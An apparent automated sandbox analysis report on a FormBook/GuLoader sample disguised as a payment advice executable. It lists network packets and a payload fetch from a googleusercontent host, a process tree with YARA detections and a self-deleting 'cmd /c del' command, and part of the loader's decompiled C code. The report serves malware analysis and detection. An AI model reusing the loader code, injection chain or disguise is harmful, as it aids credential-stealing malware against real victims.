Apr 15, 2021 15:01:48.801306963 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.801403046 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.802939892 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.802963972 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.803026915 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.803061008 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.804645061 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.804667950 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.804698944 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.804732084 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.806283951 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.806308031 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.806349039 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.806377888 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.807975054 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.808006048 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.808038950 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.808064938 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.809662104 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.809693098 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.809730053 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.809757948 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.811359882 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.811388016 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.811451912 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.811495066 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.812592030 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.812622070 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.812670946 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.812696934 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.813858986 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.813888073 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.813950062 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.813978910 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.815025091 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.815052986 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.815099001 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.815124989 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.816303968 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.816332102 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.816386938 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.816411972 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.817548990 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.817575932 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.817663908 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.817692995 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.819133043 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.819175959 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.819225073 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.819252968 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.820056915 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.820096970 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.820133924 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.820158005 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.821242094 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.821280003 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.821314096 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.821341038 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.822535992 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.822578907 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.822613955 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.822643042 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.823759079 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.823797941 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.823836088 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.823860884 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.824979067 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.825021982 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.825048923 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.825066090 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.826236010 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.826297045 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.826317072 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.826339960 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.827477932 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.827518940 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.827531099 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.827558994 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.828649998 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.828696966 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.828710079 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.828744888 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.829771042 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.829809904 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.829840899 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.829865932 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.830871105 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.830912113 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.830952883 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.830977917 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.833126068 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.833194017 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:02:10.367264986 CEST	49727	443	192.168.2.3	216.58.214.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 14:59:50.223992109 CEST	60985	53	192.168.2.3	8.8.8.8
Apr 15, 2021 14:59:50.275547028 CEST	53	60985	8.8.8.8	192.168.2.3
Apr 15, 2021 14:59:50.700944901 CEST	50200	53	192.168.2.3	8.8.8.8
Apr 15, 2021 14:59:50.749634027 CEST	53	50200	8.8.8.8	192.168.2.3
Apr 15, 2021 14:59:57.956523895 CEST	51281	53	192.168.2.3	8.8.8.8
Apr 15, 2021 14:59:58.005604029 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 15, 2021 14:59:59.089931965 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 15, 2021 14:59:59.140396118 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:00.099673033 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:00.148986101 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:00.474462986 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:00.560848951 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:02.795656919 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:02.854532003 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:26.144355059 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:26.217221022 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:30.829837084 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:30.878803968 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:31.748425961 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:31.799906969 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:37.678035021 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:37.726777077 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:38.626868963 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:38.675662041 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:40.054747105 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:40.103447914 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:44.478383064 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:44.539751053 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:45.154844046 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:45.208651066 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:46.134192944 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:46.182929993 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:46.537659883 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:46.597878933 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:47.086628914 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:47.136672020 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:48.507581949 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:48.569495916 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:49.507448912 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:49.558820009 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 15, 2021 15:00:50.445417881 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:00:50.494185925 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 15, 2021 15:01:29.489568949 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:01:29.552762985 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 15, 2021 15:01:47.144103050 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:01:47.210453033 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 15, 2021 15:01:48.100260973 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:01:48.165354967 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 15, 2021 15:01:55.260035992 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 15, 2021 15:01:55.319075108 CEST	53	50540	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 15, 2021 15:01:48.100260973 CEST	192.168.2.3	8.8.8.8	0x7d76	Standard query (0)	doc-0g-3k-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 15, 2021 15:01:48.165354967 CEST	8.8.8.8	192.168.2.3	0x7d76	No error (0)	doc-0g-3k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 15:01:48.165354967 CEST	8.8.8.8	192.168.2.3	0x7d76	No error (0)	googlehosted.l.googleusercontent.com		216.58.214.225	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 15, 2021 15:01:48.295850039 CEST	216.58.214.225	443	192.168.2.3	49727	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Mar 23 09:24:00 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Jun 15 10:23:59 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 15, 2021 15:01:48.295850039 CEST	216.58.214.225	443	192.168.2.3	49727	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: payment advice_mt103645367.exe PID: 6236 Parent PID: 5684

General

Start time:	15:00:05
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\payment advice_mt103645367.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	E4F3FD2E517743504817B7C3E2032DE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: payment advice_mt103645367.exe PID: 2440 Parent PID: 6236

General

Start time:	15:01:14
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\payment advice_mt103645367.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	E4F3FD2E517743504817B7C3E2032DE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 2440

General

Start time:	15:01:50
Start date:	15/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ipconfig.exe PID: 244 Parent PID: 3388

General

Start time:	15:02:03
Start date:	15/04/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0x9f0000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000002.497327115.0000000003B17000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000002.495667904.00000000031B0000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4856 Parent PID: 244

General

Start time:	15:02:07
Start date:	15/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Imagebase:	0x9a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1564 Parent PID: 4856

General

Start time:	15:02:08
Start date:	15/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: payment advice_mt103645367.exe PID: 6236 Parent PID: 5684 payment advice_mt103645367.exeCOMMON

Executed Functions

Function 00414264, Relevance: 894.4, APIs: 467, Strings: 42, Instructions: 3662
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00414264(signed int _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				void* _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				short _v84;
				signed int _v88;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				void* _v104;
				char _v112;
				void* _v128;
				void* _v160;
				void* _v164;
				void* _v168;
				char _v172;
				char _v180;
				char _v184;
				short _v188;
				long long _v196;
				char _v200;
				short _v204;
				char _v208;
				short _v212;
				char _v220;
				signed int _v224;
				char _v228;
				signed int _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char* _v268;
				char _v276;
				char* _v284;
				char _v292;
				char* _v300;
				char _v308;
				char* _v316;
				char _v324;
				void* _v332;
				char _v340;
				char* _v348;
				char _v356;
				char _v364;
				char _v372;
				char _v376;
				char* _v384;
				char _v392;
				char* _v400;
				char _v408;
				signed int _v416;
				char _v424;
				void* _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				char _v496;
				signed int _v500;
				signed int _v504;
				void* _v508;
				signed int _v512;
				void* _v516;
				signed int _v520;
				void* _v524;
				signed int _v528;
				short _v532;
				char _v548;
				char _v564;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				intOrPtr* _v608;
				signed int _v612;
				intOrPtr* _v616;
				signed int _v620;
				intOrPtr* _v624;
				signed int _v628;
				intOrPtr* _v632;
				signed int _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				intOrPtr* _v684;
				signed int _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				signed int _v704;
				intOrPtr* _v708;
				signed int _v712;
				intOrPtr* _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				intOrPtr* _v732;
				signed int _v736;
				intOrPtr* _v740;
				signed int _v744;
				signed int _v748;
				intOrPtr* _v752;
				signed int _v756;
				intOrPtr* _v760;
				signed int _v764;
				intOrPtr* _v768;
				signed int _v772;
				intOrPtr* _v776;
				signed int _v780;
				intOrPtr* _v784;
				signed int _v788;
				intOrPtr* _v792;
				signed int _v796;
				intOrPtr* _v800;
				signed int _v804;
				intOrPtr* _v808;
				signed int _v812;
				intOrPtr* _v816;
				signed int _v820;
				intOrPtr* _v824;
				signed int _v828;
				intOrPtr* _v832;
				signed int _v836;
				intOrPtr* _v840;
				signed int _v844;
				intOrPtr* _v848;
				signed int _v852;
				intOrPtr* _v856;
				signed int _v860;
				intOrPtr* _v864;
				signed int _v868;
				intOrPtr* _v872;
				signed int _v876;
				intOrPtr* _v880;
				signed int _v884;
				intOrPtr* _v888;
				signed int _v892;
				intOrPtr* _v896;
				signed int _v900;
				intOrPtr* _v904;
				signed int _v908;
				intOrPtr* _v912;
				signed int _v916;
				intOrPtr* _v920;
				signed int _v924;
				intOrPtr* _v928;
				signed int _v932;
				intOrPtr* _v936;
				signed int _v940;
				intOrPtr* _v944;
				signed int _v948;
				intOrPtr* _v952;
				signed int _v956;
				intOrPtr* _v960;
				signed int _v964;
				intOrPtr* _v968;
				signed int _v972;
				intOrPtr* _v976;
				signed int _v980;
				intOrPtr* _v984;
				signed int _v988;
				intOrPtr* _v992;
				signed int _v996;
				intOrPtr* _v1000;
				signed int _v1004;
				intOrPtr* _v1008;
				signed int _v1012;
				intOrPtr* _v1016;
				signed int _v1020;
				intOrPtr* _v1024;
				signed int _v1028;
				signed int _v1032;
				intOrPtr* _v1036;
				signed int _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				intOrPtr* _v1056;
				signed int _v1060;
				intOrPtr* _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				intOrPtr* _v1092;
				signed int _v1096;
				signed int _t1707;
				signed int _t1711;
				char* _t1716;
				signed int _t1720;
				char* _t1725;
				signed int _t1729;
				char* _t1730;
				char* _t1731;
				char* _t1732;
				char* _t1736;
				signed int _t1740;
				signed int _t1760;
				signed int _t1764;
				char* _t1768;
				signed int _t1772;
				char* _t1777;
				signed int _t1781;
				char* _t1786;
				signed int _t1790;
				char* _t1794;
				char* _t1795;
				signed int _t1811;
				signed int _t1814;
				signed int _t1818;
				char* _t1821;
				signed int _t1825;
				signed int _t1829;
				signed int _t1830;
				signed int _t1838;
				signed int _t1844;
				signed int _t1858;
				char* _t1864;
				signed int _t1877;
				signed int _t1886;
				signed int _t1890;
				char* _t1897;
				char* _t1898;
				short _t1899;
				char* _t1900;
				signed int _t1903;
				signed int _t1909;
				signed int _t1914;
				signed int _t1921;
				signed int _t1926;
				signed int _t1931;
				signed int _t1935;
				char* _t1940;
				signed int _t1944;
				signed int _t1950;
				char* _t1953;
				signed int _t1956;
				signed int _t1969;
				signed int _t1974;
				signed int _t1978;
				signed int _t1982;
				signed int _t1989;
				signed int _t1993;
				signed int _t1997;
				signed int _t2001;
				signed int _t2005;
				signed int _t2009;
				signed int _t2013;
				signed int _t2017;
				signed int _t2021;
				signed int _t2025;
				char* _t2026;
				signed int _t2032;
				signed int _t2036;
				signed int _t2040;
				signed int _t2044;
				signed int _t2048;
				signed int _t2052;
				signed int _t2056;
				signed int _t2060;
				signed int _t2064;
				signed int _t2068;
				signed int _t2072;
				signed int _t2076;
				signed int _t2080;
				signed int _t2084;
				signed int _t2088;
				signed int _t2092;
				signed int _t2096;
				signed int _t2100;
				signed int _t2104;
				signed int _t2108;
				signed int _t2112;
				signed int _t2116;
				signed int _t2120;
				signed int _t2124;
				signed int _t2128;
				signed int _t2132;
				signed int _t2136;
				signed int _t2140;
				signed int _t2144;
				signed int _t2148;
				signed int _t2152;
				signed int _t2156;
				signed int _t2160;
				signed int _t2164;
				signed int _t2168;
				signed int _t2172;
				signed int _t2176;
				signed int _t2180;
				signed int _t2184;
				signed int _t2188;
				signed int _t2192;
				signed int _t2196;
				signed int _t2200;
				signed int _t2204;
				signed int _t2208;
				signed int _t2212;
				signed int _t2216;
				signed int _t2220;
				signed int _t2224;
				signed int _t2228;
				signed int _t2232;
				signed int _t2236;
				char* _t2237;
				signed int _t2243;
				signed int _t2247;
				signed int _t2255;
				signed int _t2272;
				signed int _t2276;
				signed int _t2297;
				signed int _t2302;
				signed int _t2309;
				signed int _t2314;
				char* _t2318;
				char* _t2319;
				signed int _t2322;
				short _t2323;
				signed int _t2329;
				signed int _t2333;
				void* _t2334;
				char* _t2362;
				char* _t2370;
				char* _t2643;
				void* _t2722;
				void* _t2727;
				intOrPtr _t2801;
				void* _t2802;
				void* _t2803;
				void* _t2804;
				void* _t2806;
				void* _t2807;
				void* _t2808;
				void* _t2810;
				void* _t2811;
				void* _t2813;
				void* _t2816;
				void* _t2818;
				void* _t2820;
				signed int _t2947;
				char _t2951;

				 *[fs:0x0] = _t2801;
				L00401530();
				_v28 = _t2801;
				_v24 = 0x4011d8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t2722, _t2727, _t2334,  *[fs:0x0], 0x401536);
				_v8 = 1;
				_v8 = 2;
				if( *0x425010 != 0) {
					_v608 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v608 = 0x425010;
				}
				_t1707 =  &_v236;
				L004017C4();
				_v500 = _t1707;
				_t1711 =  *((intOrPtr*)( *_v500 + 0x130))(_v500,  &_v240, _t1707,  *((intOrPtr*)( *((intOrPtr*)( *_v608)) + 0x308))( *_v608));
				asm("fclex");
				_v504 = _t1711;
				if(_v504 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x405038);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v612 = _t1711;
				}
				_push(0);
				_push(0);
				_push(_v240);
				_push( &_v276);
				L004017CA();
				_t2802 = _t2801 + 0x10;
				if( *0x425010 != 0) {
					_v616 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v616 = 0x425010;
				}
				_t1716 =  &_v244;
				L004017C4();
				_v508 = _t1716;
				_t1720 =  *((intOrPtr*)( *_v508 + 0x158))(_v508,  &_v248, _t1716,  *((intOrPtr*)( *((intOrPtr*)( *_v616)) + 0x300))( *_v616));
				asm("fclex");
				_v512 = _t1720;
				if(_v512 >= 0) {
					_v620 = _v620 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x405048);
					_push(_v508);
					_push(_v512);
					L004017B8();
					_v620 = _t1720;
				}
				_push(0);
				_push(0);
				_push(_v248);
				_push( &_v292);
				L004017CA();
				_t2803 = _t2802 + 0x10;
				if( *0x425010 != 0) {
					_v624 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v624 = 0x425010;
				}
				_t1725 =  &_v252;
				L004017C4();
				_v516 = _t1725;
				_t1729 =  *((intOrPtr*)( *_v516 + 0x158))(_v516,  &_v256, _t1725,  *((intOrPtr*)( *((intOrPtr*)( *_v624)) + 0x300))( *_v624));
				asm("fclex");
				_v520 = _t1729;
				if(_v520 >= 0) {
					_v628 = _v628 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x405048);
					_push(_v516);
					_push(_v520);
					L004017B8();
					_v628 = _t1729;
				}
				_push(0);
				_push(0);
